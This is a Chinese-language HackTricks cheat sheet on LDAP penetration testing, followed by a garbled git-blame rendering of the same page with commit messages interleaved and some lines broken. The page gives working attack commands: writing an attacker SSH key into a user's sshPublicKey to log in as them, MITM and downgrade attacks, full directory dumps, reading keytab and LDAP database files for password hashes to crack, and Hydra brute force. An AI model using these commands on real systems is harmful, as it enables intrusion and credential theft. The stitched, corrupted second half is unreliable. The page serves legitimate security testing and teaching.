hacktricks/network-services-pentesting/pentesting-ldap.md

# 389, 636, 3268, 3269 - LDAP渗透测试

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* 如果你在一家**网络安全公司**工作，想在**HackTricks**上看到你的**公司广告**，或者想要获取**PEASS最新版本或下载HackTricks的PDF**？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列。
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)。
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**

</details>

## 基本信息

摘自：[https://searchmobilecomputing.techtarget.com/definition/LDAP](https://searchmobilecomputing.techtarget.com/definition/LDAP)

LDAP（轻量级目录访问协议）是一种软件协议，用于使任何人都能够在网络中**定位**组织、个人和其他**资源**，如文件和设备，无论是在公共互联网上还是在企业内网上。LDAP是Directory Access Protocol（DAP）的"轻量级"（代码量更少）版本。

一个LDAP目录可以在许多服务器之间**分布**。每个服务器都可以有一个总目录的**复制**版本，该版本会定期进行**同步**。一个LDAP服务器被称为目录系统代理（DSA）。接收到用户请求的LDAP服务器负责该请求，必要时将其传递给其他DSA，但确保为用户提供一个协调的单一响应。

一个LDAP目录在组织上是一个简单的"树"层次结构，包括以下级别：

* 根目录（树的起点或源头），它分支出去到
* 各个国家，每个国家又分支出去到
* 组织，它们又分支出去到
* 组织单位（部门、部门等），它们又分支出去到（包括条目）
* 个人（包括人员、文件和共享资源，如打印机）

**默认端口：**389和636（ldaps）。全局目录（ActiveDirectory中的LDAP）默认在端口3268和3269上可用于LDAPS。
```
PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped
```
### LDAP 数据交换格式

LDIF（LDAP 数据交换格式）将目录内容定义为一组记录。它还可以表示更新请求（添加、修改、删除、重命名）。
```bash
dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
```
* 第1-3行定义了顶级域local
* 第5-8行定义了一级域moneycorp（moneycorp.local）
* 第10-16行定义了两个组织单位：dev和sales
* 第18-26行创建了一个域对象并为其分配了带有值的属性

## 写入数据

请注意，如果您可以修改值，您可能能够执行一些非常有趣的操作。例如，想象一下，如果您**可以更改用户或任何用户的"sshPublicKey"信息**。如果这个属性存在，那么很有可能**ssh正在从LDAP读取公钥**。如果您可以修改用户的公钥，即使在ssh中没有启用密码认证，您**也将能够以该用户身份登录**。
```bash
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
## 嗅探明文凭证

如果LDAP未使用SSL，你可以在网络中**嗅探明文凭证**。

此外，你可以在**LDAP服务器和客户端之间**的网络中执行**MITM**攻击。在这里，你可以进行**降级攻击**，使客户端使用**明文凭证**登录。

**如果使用了SSL**，你可以尝试执行上述的**MITM**攻击，但提供一个**假证书**，如果**用户接受了它**，你就能降级认证方法并再次看到凭证。

## 匿名访问

### 绕过TLS SNI检查

根据[**这篇文章**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)，仅通过使用任意域名（如company.com）访问LDAP服务器，作者能够作为匿名用户联系LDAP服务并提取信息：
```bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
### LDAP匿名绑定

[LDAP匿名绑定](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)允许**未经认证的攻击者**检索域中的信息，例如用户、组、计算机的完整列表，用户账户属性，以及域密码策略。这是一种**遗留配置**，自Windows Server 2003起，只有经过认证的用户才被允许发起LDAP请求。\
然而，管理员可能需要**为特定应用程序设置允许匿名绑定**，并且无意中提供了超出预期的访问权限，从而使未经认证的用户能够访问AD中的所有对象。

## 有效凭证

如果您拥有登录LDAP服务器的有效凭证，您可以使用以下工具导出有关域管理员的所有信息：

[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
```bash
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
```
### [暴力破解](../generic-methodologies-and-resources/brute-force.md#ldap)

## 枚举

### 自动化

使用此方法，您将能够查看**公共信息**（如域名）**：**
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
### Python

<details>

<summary>查看使用 Python 进行 LDAP 枚举</summary>

您可以尝试**使用或不使用凭证通过 Python 枚举 LDAP**：`pip3 install ldap3`

首先尝试**不使用**凭证连接：
```bash
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info
```
如果响应是`True`，如前面的例子所示，你可以从以下位置获取LDAP（如**命名上下文**或**域名**）服务器的一些**有趣数据**：
```bash
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN
```
```markdown
一旦你有了命名上下文，你就可以进行一些更加令人兴奋的查询。这个简单的查询应该会显示目录中的所有对象：
```
```bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries
```
或者**导出**整个ldap：
```bash
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries
```
</details>

### windapsearch

[**Windapsearch**](https://github.com/ropnop/windapsearch) \*\*\*\* 是一个 Python 脚本，通过使用 LDAP 查询，可以有效地从 Windows 域中**枚举用户、组和计算机**。
```bash
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
```
### ldapsearch

检查空凭证或您的凭证是否有效：
```bash
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
```

```bash
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
```
如果你发现某些内容显示“_bind must be completed_”意味着凭证不正确。

你可以使用以下方法从一个域中提取**所有信息**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
```
提取**用户**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
```
提取**computers**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取**我的信息**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取 **Domain Admins**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取**域用户**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取 **Enterprise Admins**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取**管理员**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取 **Remote Desktop Group**：
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
要查看您是否有权访问任何密码，您可以在执行其中一个查询后使用 grep：
```bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
```
请注意，您在这里找到的密码可能不是真实的密码...

#### pbis

您可以从这里下载 **pbis**：[https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/)，通常安装在 `/opt/pbis`。\
**Pbis** 允许您轻松获取基本信息：
```bash
#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done
```
## 图形界面

### Apache Directory

[**从这里下载 Apache Directory**](https://directory.apache.org/studio/download/download-linux.html)。你可以在[这里找到如何使用这个工具的示例](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s)。

### jxplorer

你可以在这里下载带有 LDAP 服务器的图形界面：[http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)

默认安装在：_/opt/jxplorer_

![](<../.gitbook/assets/image (22) (1).png>)

### Godap

你可以在[https://github.com/Macmod/godap](https://github.com/Macmod/godap)访问它

## 通过 kerberos 进行认证

使用 `ldapsearch`，你可以通过 `-Y GSSAPI` 参数**使用 kerberos 进行认证**，而不是通过 **NTLM**

## POST

如果你能访问包含数据库的文件（可能在 _/var/lib/ldap_ 中）。你可以使用以下方法提取哈希：
```bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
```
您可以将密码哈希（从 '{SSHA}' 到 'structural'，不添加 'structural'）提供给john。

### 配置文件

* 通用
* containers.ldif
* ldap.cfg
* ldap.conf
* ldap.xml
* ldap-config.xml
* ldap-realm.xml
* slapd.conf
* IBM SecureWay V3 服务器
* V3.sas.oc
* Microsoft Active Directory 服务器
* msadClassesAttrs.ldif
* Netscape Directory Server 4
* nsslapd.sas\_at.conf
* nsslapd.sas\_oc.conf
* OpenLDAP 目录服务器
* slapd.sas\_at.conf
* slapd.sas\_oc.conf
* Sun ONE Directory Server 5.1
* 75sas.ldif

## HackTricks 自动命令
```
Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a "lightweight" (smaller amount of code) version of Directory Access Protocol (DAP).

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* 您是否在**网络安全公司**工作？您是否希望在**HackTricks中看到您的公司广告**？或者您是否想要访问**PEASS的最新版本或以PDF格式下载HackTricks**？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs集合**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**

</details>
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								# 389, 636, 3268, 3269 - LDAP渗透测试
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												update twitter

											
										
										
											2023-04-25 18:35:28 +00:00
+								<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								* 如果你在一家**网络安全公司**工作，想在**HackTricks**上看到你的**公司广告**，或者想要获取**PEASS最新版本或下载HackTricks的PDF**？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
 								* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列。
 								* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)。
 								* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
 								* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 基本信息
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								摘自：[https://searchmobilecomputing.techtarget.com/definition/LDAP](https://searchmobilecomputing.techtarget.com/definition/LDAP)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								LDAP（轻量级目录访问协议）是一种软件协议，用于使任何人都能够在网络中**定位**组织、个人和其他**资源**，如文件和设备，无论是在公共互联网上还是在企业内网上。LDAP是Directory Access Protocol（DAP）的"轻量级"（代码量更少）版本。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								一个LDAP目录可以在许多服务器之间**分布**。每个服务器都可以有一个总目录的**复制**版本，该版本会定期进行**同步**。一个LDAP服务器被称为目录系统代理（DSA）。接收到用户请求的LDAP服务器负责该请求，必要时将其传递给其他DSA，但确保为用户提供一个协调的单一响应。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								一个LDAP目录在组织上是一个简单的"树"层次结构，包括以下级别：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								* 根目录（树的起点或源头），它分支出去到
 								* 各个国家，每个国家又分支出去到
 								* 组织，它们又分支出去到
 								* 组织单位（部门、部门等），它们又分支出去到（包括条目）
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								* 个人（包括人员、文件和共享资源，如打印机）
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								**默认端口：**389和636（ldaps）。全局目录（ActiveDirectory中的LDAP）默认在端口3268和3269上可用于LDAPS。
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								PORT    STATE SERVICE REASON
 /tcp open  ldap    syn-ack
 /tcp open  tcpwrapped
 								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								### LDAP 数据交换格式
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								LDIF（LDAP 数据交换格式）将目录内容定义为一组记录。它还可以表示更新请求（添加、修改、删除、重命名）。
-												GitBook: [master] 3 pages and one asset modified
											
										
										
											2021-06-08 20:38:29 +00:00
+								```bash
 								dn: dc=local
 								dc: local
 								objectClass: dcObject
 								dn: dc=moneycorp,dc=local
 								dc: moneycorp
 								objectClass: dcObject
 								objectClass: organization
 								dn ou=it,dc=moneycorp,dc=local
 								objectClass: organizationalUnit
 								ou: dev
 								dn: ou=marketing,dc=moneycorp,dc=local
 								objectClass: organizationalUnit
 								Ou: sales
 								dn: cn= ,ou= ,dc=moneycorp,dc=local
 								objectClass: personalData
 								cn:
 								sn:
 								gn:
 								uid:
 								ou:
 								mail: pepe@hacktricks.xyz
 								phone: 23627387495
 								```
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								* 第1-3行定义了顶级域local
 								* 第5-8行定义了一级域moneycorp（moneycorp.local）
 								* 第10-16行定义了两个组织单位：dev和sales
 								* 第18-26行创建了一个域对象并为其分配了带有值的属性
-												GitBook: [master] 3 pages and one asset modified
											
										
										
											2021-06-08 20:38:29 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 写入数据
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								请注意，如果您可以修改值，您可能能够执行一些非常有趣的操作。例如，想象一下，如果您**可以更改用户或任何用户的"sshPublicKey"信息**。如果这个属性存在，那么很有可能**ssh正在从LDAP读取公钥**。如果您可以修改用户的公钥，即使在ssh中没有启用密码认证，您**也将能够以该用户身份登录**。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								>>> import ldap3
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
 								>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								>>> connection.bind()
 								True
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								>>> connection.extend.standard.who_am_i()
 								u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
 								>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 嗅探明文凭证
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								如果LDAP未使用SSL，你可以在网络中**嗅探明文凭证**。
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								此外，你可以在**LDAP服务器和客户端之间**的网络中执行**MITM**攻击。在这里，你可以进行**降级攻击**，使客户端使用**明文凭证**登录。
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								**如果使用了SSL**，你可以尝试执行上述的**MITM**攻击，但提供一个**假证书**，如果**用户接受了它**，你就能降级认证方法并再次看到凭证。
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 匿名访问
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 绕过TLS SNI检查
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								根据[**这篇文章**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)，仅通过使用任意域名（如company.com）访问LDAP服务器，作者能够作为匿名用户联系LDAP服务并提取信息：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
+								ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### LDAP匿名绑定
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								[LDAP匿名绑定](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)允许**未经认证的攻击者**检索域中的信息，例如用户、组、计算机的完整列表，用户账户属性，以及域密码策略。这是一种**遗留配置**，自Windows Server 2003起，只有经过认证的用户才被允许发起LDAP请求。\
 								然而，管理员可能需要**为特定应用程序设置允许匿名绑定**，并且无意中提供了超出预期的访问权限，从而使未经认证的用户能够访问AD中的所有对象。
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								## 有效凭证
-												GitBook: [#3568] No subject

											
										
										
											2022-10-05 21:51:12 +00:00
-												Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

											
										
										
											2023-12-26 21:49:09 +00:00
+								如果您拥有登录LDAP服务器的有效凭证，您可以使用以下工具导出有关域管理员的所有信息：
-												GitBook: [#3568] No subject

											
										
